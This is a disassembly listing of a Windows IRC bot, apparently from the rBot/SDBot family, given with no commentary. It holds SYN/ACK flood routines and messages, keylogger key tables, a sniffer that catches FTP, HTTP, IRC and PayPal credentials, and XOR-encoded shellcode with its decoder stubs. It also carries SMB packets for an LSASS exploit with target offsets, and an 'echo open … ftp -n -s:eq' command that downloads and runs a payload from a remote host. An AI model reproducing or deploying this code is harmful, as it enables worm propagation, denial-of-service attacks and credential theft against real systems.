db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aErrorSetsockop db 'Error: setsockopt() failed, returned: <%d>.',0
align 8
unk_423238 db 2 ; DATA XREF: sub_401444+49�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 20h
db 69h, 63h, 6Dh
db 70h ; p
db 2Eh, 6Dh, 1Fh
db 64h ; d
db 1Fh, 6Ch, 20h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aErrorSocketFai db 'Error: socket() failed, returned: <%d>.',0
dword_423280 dd 28026502h, 62302E31h, 20282029h, 2E6E7973h, 1F641F6Dh
; DATA XREF: sub_40182F+48�o
dd 2029206Ch, 2BBBB02h
aDoneWithFloo_0 db ' Done with flood (%iKB/sec).',0
align 4
dword_4232BC dd 28026502h, 62302E31h, 20282029h, 2E6E7973h, 1F641F6Dh
; DATA XREF: sub_4018CB+295�o
dd 2029206Ch, 2BBBB02h
aSendErrorD__0 db ' Send error: <%d>.',0
align 10h
dword_4232F0 dd 28026502h, 62302E31h, 20282029h, 2E706374h, 1F641F6Dh
; DATA XREF: sub_401BD4+4E4�o
dd 2029206Ch, 2BBBB02h
aErrorSending_0 db ' Error sending packets to IP: %s. Packets sent: %d. Returned: <%'
db 'd>.',0
align 8
dword_423358 dd 28026502h, 62302E31h, 20282029h, 2E706374h, 1F641F6Dh
; DATA XREF: sub_401BD4+471�o
dd 2029206Ch, 2BBBB02h
aDoneWithSFlo_0 db ' Done with %s flood to IP: %s. Sent: %d packet(s) @ %dKB/sec (%d'
db 'MB).',0
align 4
aRandom db 'random',0 ; DATA XREF: sub_401BD4+2FD�o
; sub_40CD3A+2A6D�o ...
align 4
aAck db 'ack',0 ; DATA XREF: sub_401BD4+2DD�o
; sub_40CD3A+2A56�o
aSyn db 'syn',0 ; DATA XREF: sub_401BD4+2BD�o
; sub_40CD3A+2A3E�o
dword_4233CC dd 28026502h, 62302E31h, 20282029h, 2E706374h, 1F641F6Dh
; DATA XREF: sub_401BD4+15F�o
dd 2029206Ch, 2BBBB02h
aInvalidTarge_0 db ' Invalid target IP.',0
align 10h
dword_423400 dd 28026502h, 62302E31h, 20282029h, 2E706374h, 1F641F6Dh
; DATA XREF: sub_401BD4+EE�o
dd 2029206Ch, 2BBBB02h
aErrorSetsock_0 db ' Error: setsockopt() failed, returned: <%d>.',0
align 10h
dword_423450 dd 28026502h, 62302E31h, 20282029h, 2E706374h, 1F641F6Dh
; DATA XREF: sub_401BD4+70�o
dd 2029206Ch, 2BBBB02h
aErrorSocketF_0 db ' Error: socket() failed, returned: <%d>.',0
align 4
dw 8
unicode 0, <>,0
aB: ; DATA XREF: sub_4021FB:loc_4022DE�o
unicode 0, <b>,0
dd 62000000h, 2 dup(0)
dd 0Dh, 65h, 65000000h, 2 dup(0)
dd 1Bh, 4353455Bh, 5B00005Dh, 5D435345h, 0
dd 70h, 5D31465Bh, 5B000000h, 5D3146h, 0
dd 71h, 5D32465Bh, 5B000000h, 5D3246h, 0
dd 72h, 5D33465Bh, 5B000000h, 5D3346h, 0
dd 73h, 5D34465Bh, 5B000000h, 5D3446h, 0
dd 74h, 5D35465Bh, 5B000000h, 5D3546h, 0
dd 75h, 5D36465Bh, 5B000000h, 5D3646h, 0
dd 76h, 5D37465Bh, 5B000000h, 5D3746h, 0
dd 77h, 5D38465Bh, 5B000000h, 5D3846h, 0
dd 78h, 5D39465Bh, 5B000000h, 5D3946h, 0
dd 79h, 3031465Bh, 5B00005Dh, 5D303146h, 0
dd 7Ah, 3131465Bh, 5B00005Dh, 5D313146h, 0
dd 7Bh, 3231465Bh, 5B00005Dh, 5D323146h, 0
dd 0C0h, 60h, 7E000000h, 2 dup(0)
dd 2 dup(31h), 21000000h, 2 dup(0)
dd 2 dup(32h), 40000000h, 2 dup(0)
dd 2 dup(33h), 23000000h, 2 dup(0)
dd 2 dup(34h), 24000000h, 2 dup(0)
dd 2 dup(35h), 25000000h, 2 dup(0)
dd 2 dup(36h), 5E000000h, 2 dup(0)
dd 2 dup(37h), 26000000h, 2 dup(0)
dd 2 dup(38h), 2A000000h, 2 dup(0)
dd 2 dup(39h), 28000000h, 2 dup(0)
dd 2 dup(30h), 29000000h, 2 dup(0)
dd 0BDh, 2Dh, 5F000000h, 2 dup(0)
dd 0BBh, 3Dh, 2B000000h, 2 dup(0)
dd 9, 4241545Bh, 5B00005Dh, 5D424154h, 0
dd 51h, 71h, 51000000h, 2 dup(0)
dd 57h, 77h, 57000000h, 2 dup(0)
dd 45h, 65h, 45000000h, 2 dup(0)
dd 52h, 72h, 52000000h, 2 dup(0)
dd 54h, 74h, 54000000h, 2 dup(0)
dd 59h, 79h, 59000000h, 2 dup(0)
dd 55h, 75h, 55000000h, 2 dup(0)
dd 49h, 69h, 49000000h, 2 dup(0)
dd 4Fh, 6Fh, 4F000000h, 2 dup(0)
dd 50h, 70h, 50000000h, 2 dup(0)
dd 0DBh, 5Bh, 7B000000h, 2 dup(0)
dd 0DDh, 0
dd 7D000000h, 2 dup(0)
dd 41h, 61h, 61000000h, 2 dup(0)
dd 53h, 73h, 53000000h, 2 dup(0)
dd 44h, 64h, 44000000h, 2 dup(0)
dd 46h, 66h, 46000000h, 2 dup(0)
dd 47h, 67h, 47000000h, 2 dup(0)
dd 48h, 68h, 48000000h, 2 dup(0)
dd 4Ah, 6Ah, 4A000000h, 2 dup(0)
dd 4Bh, 6Bh, 4B000000h, 2 dup(0)
dd 4Ch, 6Ch, 4C000000h, 2 dup(0)
dd 0BAh, 3Bh, 3A000000h, 2 dup(0)
dd 0DEh, 27h, 22000000h, 2 dup(0)
dd 5Ah, 7Ah, 5A000000h, 2 dup(0)
dd 58h, 78h, 58000000h, 2 dup(0)
dd 43h, 63h, 43000000h, 2 dup(0)
dd 56h, 76h, 56000000h, 2 dup(0)
dd 42h, 62h, 42000000h, 2 dup(0)
dd 4Eh, 6Eh, 4E000000h, 2 dup(0)
dd 4Dh, 6Dh, 4D000000h, 2 dup(0)
dd 0BCh, 2Ch, 3C000000h, 2 dup(0)
dd 0BEh, 2Eh, 3E000000h, 2 dup(0)
dd 0BFh, 2Fh, 2E000000h, 3Fh, 0
dd 0DCh, 5Ch, 7C000000h, 2 dup(0)
dd 11h, 5254435Bh, 5B005D4Ch, 4C525443h, 5Dh, 5Bh, 4E49575Bh
dd 5B00005Dh, 5D4E4957h, 0
dd 2 dup(20h), 20000000h, 2 dup(0)
dd 5Ch, 4E49575Bh, 5B00005Dh, 5D4E4957h, 0
dd 2Ch, 5352505Bh, 5B005D43h, 43535250h, 5Dh, 91h, 4C43535Bh
dd 5B005D4Bh, 4B4C4353h, 5Dh, 2Dh, 534E495Bh, 5B00005Dh
dd 5D534E49h, 0
dd 24h, 4D4F485Bh, 5B005D45h, 454D4F48h, 5Dh, 21h, 5547505Bh
dd 5B005D50h, 50554750h, 5Dh, 2Eh, 4C45445Bh, 5B00005Dh
dd 5D4C4544h, 0
dd 23h, 444E455Bh, 5B00005Dh, 5D444E45h, 0
dd 22h, 4447505Bh, 5B005D4Eh, 4E444750h, 5Dh, 25h, 46454C5Bh
dd 5B005D54h, 5446454Ch, 5Dh, 26h, 5D50555Bh, 5B000000h
dd 5D5055h, 0
dd 27h, 4847525Bh, 5B005D54h, 54484752h, 5Dh, 28h, 574F445Bh
dd 5B005D4Eh, 4E574F44h, 5Dh, 90h, 4C4D4E5Bh, 5B005D4Bh
dd 4B4C4D4Eh, 5Dh, 6Fh, 2Fh, 2F000000h, 2 dup(0)
dd 6Ah, 2Ah, 2A000000h, 2 dup(0)
dd 6Dh, 2Dh, 2D000000h, 2 dup(0)
dd 6Bh, 2Bh, 2B000000h, 2 dup(0)
dd 60h, 30h, 30000000h, 2 dup(0)
dd 61h, 31h, 31000000h, 2 dup(0)
dd 62h, 32h, 32000000h, 2 dup(0)
dd 63h, 33h, 33000000h, 2 dup(0)
dd 64h, 34h, 34000000h, 2 dup(0)
dd 65h, 35h, 35000000h, 2 dup(0)
dd 66h, 36h, 36000000h, 2 dup(0)
dd 67h, 37h, 37000000h, 2 dup(0)
dd 68h
dword_423BCC dd 38h, 38000000h, 2 dup(0) dd 69h, 39h, 39000000h, 2 dup(0)
dd 6Eh, 2Eh, 2E000000h, 2 dup(0)
dword_423C04 dd 28026502h, 62302E31h, 20282029h, 6C79656Bh, 6D2E676Fh
; DATA XREF: sub_40211C+AC�o
dd 6C1F641Fh, 2202920h, 2002BBBBh, 732520h
aDDDDDDS db '[%d-%d-%d %d:%d:%d] %s',0Dh,0Ah,0 ; DATA XREF: sub_40211C+86�o
align 4
aAb db 'ab',0 ; DATA XREF: sub_40211C+4E�o
; sub_40CD3A+291B�o
align 4
asc_423C48: ; DATA XREF: sub_40211C+2C�o
unicode 0, <\>,0
aSReturnS db '%s (Return) (%s)',0 ; DATA XREF: sub_4021FB+21C�o
align 10h
aSBufferFullS db '%s (Buffer full) (%s)',0 ; DATA XREF: sub_4021FB+1D9�o
align 4
aSChangedWindow db '%s (Changed Windows: %s)',0 ; DATA XREF: sub_4021FB+8F�o
align 8
off_423C98 dd offset dword_424510 ; DATA XREF: sub_4024D0+29E�r
dd offset off_42450C
dd offset aFtp ; "FTP"
dd offset aHttp ; "HTTP"
dword_423CA8 dd 6F6C2E3Ah, 6E6967h, 3 dup(0)dword_423CBC dd 0 dd 6F6C2C3Ah, 6E6967h, 4 dup(0)
dd 6F6C213Ah, 6E6967h, 4 dup(0)
dd 6F6C403Ah, 6E6967h, 4 dup(0)
dd 6F6C243Ah, 6E6967h, 4 dup(0)
dd 6F6C253Ah, 6E6967h, 4 dup(0)
dd 6F6C5E3Ah, 6E6967h, 4 dup(0)
dd 6F6C263Ah, 6E6967h, 4 dup(0)
dd 6F6C2A3Ah, 6E6967h, 4 dup(0)
dd 6F6C2D3Ah, 6E6967h, 4 dup(0)
dd 6F6C2B3Ah, 6E6967h, 4 dup(0)
dd 6F6C2F3Ah, 6E6967h, 4 dup(0)
dd 6F6C5C3Ah, 6E6967h, 4 dup(0)
dd 6F6C3D3Ah, 6E6967h, 4 dup(0)
dd 6F6C3F3Ah, 6E6967h, 4 dup(0)
dd 6F6C273Ah, 6E6967h, 4 dup(0)
dd 6F6C603Ah, 6E6967h, 4 dup(0)
dd 6F6C7E3Ah, 6E6967h, 4 dup(0)
dd 6F6C203Ah, 6E6967h, 4 dup(0)
dd 75612E3Ah, 6874h, 4 dup(0)
dd 75612C3Ah, 6874h, 4 dup(0)
dd 7561213Ah, 6874h, 4 dup(0)
dd 7561403Ah, 6874h, 4 dup(0)
dd 7561243Ah, 6874h, 4 dup(0)
dd 7561253Ah, 6874h, 4 dup(0)
dd 75615E3Ah, 6874h, 4 dup(0)
dd 7561263Ah, 6874h, 4 dup(0)
dd 75612A3Ah, 6874h, 4 dup(0)
dd 75612D3Ah, 6874h, 4 dup(0)
dd 75612B3Ah, 6874h, 4 dup(0)
dd 75612F3Ah, 6874h, 4 dup(0)
dd 75615C3Ah, 6874h, 4 dup(0)
dd 75613D3Ah, 6874h, 4 dup(0)
dd 75613F3Ah, 6874h, 4 dup(0)
dd 7561273Ah, 6874h, 4 dup(0)
dd 7561603Ah, 6874h, 4 dup(0)
dd 75617E3Ah, 6874h, 4 dup(0)
dd 7561203Ah, 6874h, 4 dup(0)
dd 64692E3Ah, 5 dup(0)
dd 64692C3Ah, 5 dup(0)
dd 6469213Ah, 5 dup(0)
dd 6469403Ah, 5 dup(0)
dd 6469243Ah, 5 dup(0)
dd 6469253Ah, 5 dup(0)
dd 64695E3Ah, 5 dup(0)
dd 6469263Ah, 5 dup(0)
dd 64692A3Ah, 5 dup(0)
dd 64692D3Ah, 5 dup(0)
dd 64692B3Ah, 5 dup(0)
dd 64692F3Ah, 5 dup(0)
dd 64695C3Ah, 5 dup(0)
dd 64693D3Ah, 5 dup(0)
dd 64693F3Ah, 5 dup(0)
dd 6469273Ah, 5 dup(0)
dd 6469603Ah, 5 dup(0)
dd 64697E3Ah, 5 dup(0)
dd 6469203Ah, 5 dup(0)
dd 61682E3Ah, 6E696873h, 4 dup(0)
dd 6168213Ah, 6E696873h, 4 dup(0)
dd 6168243Ah, 6E696873h, 4 dup(0)
dd 6168253Ah, 6E696873h, 4 dup(0)
dd 65732E3Ah, 65727563h, 4 dup(0)
dd 6573213Ah, 65727563h, 4 dup(0)
dd 6C2E3Ah, 5 dup(0)
dd 6C213Ah, 5 dup(0)
dd 6C243Ah, 5 dup(0)
dd 6C253Ah, 5 dup(0)
dd 782E3Ah, 5 dup(0)
dd 78213Ah, 5 dup(0)
dd 78243Ah, 5 dup(0)
dd 78253Ah, 5 dup(0)
dd 79732E3Ah, 6Eh, 4 dup(0)
dd 7973213Ah, 6Eh, 4 dup(0)
dd 7973243Ah, 6Eh, 4 dup(0)
dd 7973253Ah, 6Eh, 4 dup(0)
dd 4B444320h, 207965h, 4 dup(0)
dd 4E494F4Ah, 2320h, 3 dup(0)
dd 1, 4B43494Eh, 20h, 3 dup(0)
dd 1, 5245504Fh, 20h, 3 dup(0)
dd 1, 7265706Fh, 20h, 3 dup(0)
dd 1, 20776F6Eh, 49206E61h, 4F204352h, 61726570h, 726F74h
dd 1, 52455355h, 20h, 3 dup(0)
dd 2, 53534150h, 20h, 3 dup(0)
dd 2, 70796170h, 6C61h, 3 dup(0)
dd 3, 50594150h, 4C41h, 3 dup(0)
dd 3, 70796170h, 632E6C61h, 6D6Fh, 2 dup(0)
dd 3, 50594150h, 432E4C41h, 4D4Fh, 2 dup(0)
dd 3, 2D746553h, 6B6F6F43h, 3A6569h, 2 dup(0)
dd 3, 6 dup(0)
aHttp db 'HTTP',0 ; DATA XREF: .text:00423CA4�o
align 4
aFtp db 'FTP',0 ; DATA XREF: .text:00423CA0�o
off_42450C dd offset aRomSDToSD_ ; DATA XREF: .text:00423C9C�o
; "rom: %s:%d to: %s:%d."
dword_424510 dd 544F42h, 0 unk_424518 db 2 ; DATA XREF: sub_4024D0+2FC�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 2Eh, 6Dh, 1Fh
db 64h ; d
db 1Fh, 6Ch, 20h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aErrorRecvFaile db 'Error: recv() failed, returned: <%d>',0
align 10h
unk_424560 db 2 ; DATA XREF: sub_4024D0+2AB�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 2Eh, 6Dh, 1Fh
db 64h ; d
db 1Fh, 6Ch, 20h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aSuspiciousSPac db 'Suspicious %s packet from: %s:%d - %s.',0
align 4
aPsniff db '[PSNIFF]',0 ; DATA XREF: sub_4024D0+236�o
align 8
unk_4245B8 db 2 ; DATA XREF: sub_4024D0+186�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 2Eh, 6Dh, 1Fh
db 64h ; d
db 1Fh, 6Ch, 20h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aErrorWsaioctlF db 'Error: WSAIoctl() failed, returned: <%d>.',0
align 8
unk_424608 db 2 ; DATA XREF: sub_4024D0+103�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 2Eh, 6Dh, 1Fh
db 64h ; d
db 1Fh, 6Ch, 20h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aErrorBindFaile db 'Error: bind() failed, returned: <%d>.',0
align 10h
unk_424650 db 2 ; DATA XREF: sub_4024D0+85�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 2Eh, 6Dh, 1Fh
db 64h ; d
db 1Fh, 6Ch, 20h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aErrorSocketF_1 db 'Error: socket() failed, returned: <%d>.',0
; ---------------------------------------------------------------------------
jmp short loc_4246AA
; =============== S U B R O U T I N E =======================================
sub_42469A proc far ; CODE XREF: sub_42469A:loc_4246AA�p
pop ebx
dec ebx
xor ecx, ecx
mov cx, 125h
loc_4246A2: ; CODE XREF: sub_42469A+C�j
xor byte ptr [ebx+ecx], 99h
loop loc_4246A2
jmp short loc_4246AF
; ---------------------------------------------------------------------------
loc_4246AA: ; CODE XREF: .text:00424698�j
call near ptr sub_42469A
loc_4246AF: ; CODE XREF: sub_42469A+E�j
jo short loc_424713
cdq
cdq
cdq
mov ch, 38h
test eax, 12999999h
fst dword ptr [ebp+3485E912h]
adc dh, cl
xchg eax, ecx
adc ch, [esi-0Dh]
popf
sal byte ptr [ecx+2], 99h
cdq
cdq
jnp short loc_424731
icebp
stosb
stosd
cdq
cdq
icebp
out dx, al
jmp far ptr 128Fh:66CDC6ABh
; ---------------------------------------------------------------------------
db 71h
dd 71C09DF3h, 9999991Bh, 7518607Bh, 99999809h, 9898F1CDh
dd 0CF669999h, 0C9C9C989h, 0D9C9D9C9h, 8DCF66C9h, 0E6F14112h
dd 0F1989999h, 4B9D999Bh
; ---------------------------------------------------------------------------
adc dl, [ebp-0Dh]
loc_424713: ; CODE XREF: sub_42469A:loc_4246AF�j
mov eax, ecx
retf 0CF66h
; ---------------------------------------------------------------------------
dd 0EC591C81h, 0F4FAF1D3h, 0FF1099FDh, 0CD751AA9h, 0F3BDA514h
dd 7B32C08Ch
db 64h
; ---------------------------------------------------------------------------
loc_424731: ; CODE XREF: sub_42469A+35�j
pop edi
fnstsw word ptr [ebp-22982277h]
mov ebp, 0BDC510A4h
rcl dword ptr [eax], 1
lds edi, [ebp-423AEF2Bh]
leave
adc al, 0DDh
mov ebp, 0C8C9CD89h
enter 0FFFFF3C8h, 98h
enter 66C8h, 0EFh
test eax, 9DCF66C8h
adc dl, [ebp-0Dh]
db 66h, 66h
test al, 66h
iret
sub_42469A endp ; sp-analysis failed
; ---------------------------------------------------------------------------
xchg eax, ecx
retf 0CF66h
; ---------------------------------------------------------------------------
dw 6685h
dd 0CFC895CFh, 12A5DC12h, 9AE1B1CDh, 0EB12CB4Ch, 0AA6C9AB9h
dd 34D8D050h, 42AA5C9Ah, 0A3892796h, 5891ED4Fh, 439A9452h
dd 0A26872D9h, 0C37EEC86h, 9ABDC312h, 9512FF44h, 85C312D2h
dd 9D12449Ah, 325C9A12h, 715AC0C7h, 66666699h, 7597D717h
dd 8F2A67EBh, 579C4034h, 0F9795776h, 0A2657452h, 346C9040h
dd 0F9336075h, 0E05FE07Eh, 0
; ---------------------------------------------------------------------------
loc_4247D8: ; DATA XREF: sub_40297A+151�o
; sub_40297A+20F�o
jmp short loc_4247EA
; =============== S U B R O U T I N E =======================================
sub_4247DA proc near ; CODE XREF: sub_4247DA:loc_4247EA�p
pop edx
dec edx
xor ecx, ecx
mov cx, 17Dh
loc_4247E2: ; CODE XREF: sub_4247DA+C�j
xor byte ptr [edx+ecx], 99h
loop loc_4247E2
jmp short loc_4247EF
; ---------------------------------------------------------------------------
loc_4247EA: ; CODE XREF: .text:loc_4247D8�j
call sub_4247DA
loc_4247EF: ; CODE XREF: sub_4247DA+E�j
jo short near ptr dword_424768+1Eh
cwde
cdq
cdq
retn
sub_4247DA endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 0FDh, 38h, 0A9h
dd 12999999h, 0E91295D9h, 0D9123485h, 12411291h, 0ED12A5EAh
dd 6A9AE187h, 9AB9E712h, 8DD71262h, 0CECF74AAh, 9AA612C8h
dd 0F36B1262h, 3F6AC097h, 0C6C091EDh, 0DC9D5E1Ah, 0C6C0707Bh
dd 125412C7h, 5A9ABDDFh, 589A7848h, 12FF50AAh, 85DF1291h
dd 78585A9Ah, 12589A9Bh, 125A9A99h, 1A6E1263h, 4912975Fh
dd 71C09AF3h, 9999991Eh, 0CB945F1Ah, 65CE66CFh, 0F34112C3h
dd 0ED71C09Ch, 0C9999999h, 0F3C9C9C9h, 669BF398h, 411275CEh
dd 999B9E5Eh
dword_424888 dd 59AA4B9Dh, 0F39DDE10h, 66CACE89h, 98F369CEh, 6DCE66CAh
; DATA XREF: sub_40297A+102�o
dd 66CAC9C9h, 491261CEh, 12DD751Ah, 0F359AA6Dh, 9D10C089h
dd 10627B17h, 0CF10A1CFh, 0D9CF10A5h, 0B5DF5EFFh, 0DE149898h
dd 0AACFC989h, 0C8C8C850h, 0C8C898F3h, 0FAA5DE5Eh, 1499FDF4h
dd 0C8C9A5DEh, 0CB79CE66h, 0CA65CE66h, 0C965CE66h, 0AA7DCE66h
dd 591C3559h, 0CBC860ECh, 4B66CACFh, 7B32C0C3h, 5A59AA77h
dd 66677671h, 0EDFCDE66h, 0FAF6EBC9h, 0EBFDFDD8h, 99EAEAFCh
dd 0F8FCEBDAh, 0EBC9FCEDh, 0EAFCFAF6h, 0DC99D8EAh, 0CDEDF0E1h
dd 0F8FCEBF1h, 0F6D599FDh, 0F0D5FDF8h, 0EBF8EBFBh, 0EE99D8E0h
dd 0AAC6ABEAh, 0CACE99ABh, 0FAF6CAD8h, 0D8EDFCF2h, 0F7F0FB99h
dd 0F0F599FDh, 0F7FCEDEAh, 0FAFAF899h, 99EDE9FCh, 0EAF6F5FAh
dd 0FAF6EAFCh, 99EDFCF2h, 0
dword_424970 dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
; DATA XREF: sub_402DD1+7F�o
dd 0FEFF0000h, 0
dd 2006200h
aPcNetworkProgr db 'PC NETWORK PROGRAM 1.0',0
db 2
db 4Ch ; L
db 41h, 4Eh, 4Dh
db 41h ; A
db 4Eh, 31h, 2Eh
db 30h ; 0
align 2
dw 5702h
aIndowsForWorkg db 'indows for Workgroups 3.1a',0
db 2
dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh
dd 544E0200h, 204D4C20h, 32312E30h, 2 dup(0)
dword_424A00 dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_402DD1+AA�o
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows2000219:
unicode 0, <Windows 2000 2195>,0
aWindows20005_0:
unicode 0, <Windows 2000 5.0>,0
align 10h
dword_424AB0 dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_402DD1+CF�o
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dword_424B90 dd 5C000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40297A+58�o
dd 0FEFF0000h, 300800h, 5C00FF04h, 1000800h, 3100h, 5C005Ch
dd 390031h, 2E0032h, 360031h, 2E0038h, 2E0031h, 310032h
dd 5C0030h, 500049h
aC: ; DATA XREF: sub_40297A+87�o
unicode 0, <C$>,0
a????? db '?????',0
dd 2 dup(0)
dword_424BF8 dd 64000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40297A+2B2�o
dd 4DC0800h, 400800h, 0DE00FF18h, 0E00DEh, 16h, 0
dd 2019Fh, 3 dup(0)
dd 3, 1, 40h, 2, 1103h, 6C005Ch, 610073h, 700072h, 63h
dd 2 dup(0)
dword_424C68 dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40297A+2DD�o
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 2 dup(0)
dword_424D10 dd 0F40C0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40297A+3C5�o
dd 4DC0800h, 600800h, 0A0000010h, 0Ch, 4, 2 dup(0)
dd 0A0005400h, 200540Ch, 2600h, 100CB140h, 50005Ch, 500049h
dd 5C0045h, 0
dd 3000005h, 10h, 0CA0h, 1, 0C88h, 90000h, 3ECh, 0
dd 3ECh, 0
off_424D90 dd offset loc_401493+2 ; DATA XREF: sub_40297A+3F3�o
dd 3, 40707Ch, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd offset loc_407078+4
dd 1, 0
dd 1, 0
dd offset loc_407078+4
dd 1, 0
dd 1, 0
dd offset loc_407078+4
dd 1, 0
dd 1, 0
dd 138578h, 0E9A65BABh, 2 dup(0)
dword_424E28 dd 0F8100000h, 424D53FFh, 2Fh, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40297A+316�o
dd 0FEFF0800h, 600800h, 0DE00FF0Eh, 4000DEh, 0FF000000h
dd 8FFFFFFh, 10B800h, 4010B800h, 0
dd 0EE10B900h, 1000005h, 10h, 10B8h, 1, 200Ch, 90000h
dd 0DADh, 0
dd 0DADh, 2 dup(0)
dword_424E98 dd 0D80F0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40297A+341�o
dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0)
dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h
dd 5C0045h, 0
dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 2 dup(0)
dword_424F10 dd 0 dd offset loc_40A899+1
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd offset loc_40A899+1
dd 1, 0
dd 1, 0
dd offset loc_40A899+1
dd 1, 0
dd 1, 0
dd offset loc_40A899+1
dd 1, 0
dd 1, 2 dup(0)
word_424F98 dw 0AD9Dh ; DATA XREF: sub_40282F+30�r
; sub_40297A+E4�r
align 4
dd 2 dup(0)
aWinxpProfessio db 'WinXP Professional [universal] lsass.exe ',0
align 8
dword_424FD8 dd 1004600h ; sub_40297A+242�r
dd 1, 326E6957h, 7250206Bh, 7365666Fh, 6E6F6973h, 20206C61h
dd 755B2020h, 6576696Eh, 6C617372h, 656E205Dh, 70617274h
dd 6C6C642Eh, 2 dup(0)
dd 7515123Ch, 2, 326E6957h, 6441206Bh, 636E6176h, 53206465h
dd 65767265h, 535B2072h, 205D3450h, 20202020h, 656E2020h
dd 70617274h, 6C6C642Eh, 2 dup(0)
dd 751C123Ch, 0Fh dup(0)
dword_425090 dd 0A0D7325h, 0 ; sub_4036D2+102�o ...
aEchoOpenSDEqEc db 'echo open %s %d >> eq&echo user %s %s >> eq &echo get %s >> eq &e'
; DATA XREF: sub_40282F+A4�o
db 'cho quit >> eq &ftp -n -s:eq &%s',0Dh,0Ah,0
; ---------------------------------------------------------------------------
loc_4250FC: ; DATA XREF: sub_40297A+172�o
; sub_403833+178�o
jmp short loc_425104
; ---------------------------------------------------------------------------
jmp short loc_425106
; ---------------------------------------------------------------------------
dd 0
; ---------------------------------------------------------------------------
loc_425104: ; CODE XREF: .text:loc_4250FC�j
; DATA XREF: sub_40297A+27�o ...
pop esp
pop esp
loc_425106: ; CODE XREF: .text:004250FE�j
and eax, 70695C73h
arpl [eax+eax], sp
; ---------------------------------------------------------------------------
dw 0
dword_425110 dd 1CEC8166h ; sub_403833+D�r
dword_425114 dd 0E4FF07h ; sub_403833+16�r
dword_425118 dd 30B0005h, 10h, 48h, 7Fh, 16D016D0h, 0 ; sub_4033B6+21B�o
dd 1, 10001h, 1A0h, 0
dd 0C0h, 46000000h, 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 2 dup(0)
dword_425168 dd 3000005h, 10h, 3E8h, 0E5h, 3D0h, 40001h, 60005h, 1
; DATA XREF: sub_403166+120�o
dd 0
dd 0FD582432h, 496445CCh, 0AEDD70B0h, 0D2962C74h, 0D5E60h
dd 1, 0
dd 0D5E70h, 2, 0D5E7Ch, 0
dd 10h, 0F1F19680h, 11CE4D2Ah, 20006AA6h, 0F4726EAFh, 0Ch
dd 4252414Dh, 1, 0
dd 0BAADF00Dh, 0
dd 0BF4A8h, 2 dup(360h), 574F454Dh, 4, 1A2h, 0
dd 0C0h, 46000000h, 338h, 0
dd 0C0h, 46000000h, 0
dd 330h, 328h, 0
